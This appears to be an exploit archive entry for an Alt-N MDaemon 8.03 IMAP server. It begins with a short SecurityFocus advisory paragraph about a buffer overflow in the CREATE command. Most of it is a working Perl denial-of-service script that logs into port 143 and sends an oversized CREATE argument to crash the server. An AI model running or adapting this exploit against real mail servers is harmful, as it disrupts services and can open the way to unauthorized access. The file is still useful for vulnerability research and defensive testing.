25 lines
No EOL
931 B
Perl
Executable file
25 lines
No EOL
931 B
Perl
Executable file
source: https://www.securityfocus.com/bid/14315/info
|
|
|
|
Alt-N MDaemon IMAP Server is affected by a remote buffer overflow vulnerability.
|
|
|
|
This issue presents itself when an attacker submits excessive data through the CREATE command subsequent to authentication
|
|
|
|
This vulnerability may be leveraged to execute arbitrary code in the context of the server, facilitating unauthorized access to the affected computer.
|
|
|
|
Alt-N MDaemon 8.03 is reported to be vulnerable. Other versions are likely affected as well.
|
|
|
|
### MDAEMON stack based buffer overflow
|
|
### Remote DoS exploit by kcope
|
|
use IO::Socket::INET;
|
|
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
|
|
PeerPort => '143',
|
|
Proto => 'tcp');
|
|
|
|
$a = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\\" x 10;
|
|
|
|
print $sock "a001 LOGIN username password\r\n";
|
|
print $sock "a001 CREATE $a\r\n";
|
|
|
|
while (<$sock>) {
|
|
print $_;
|
|
} |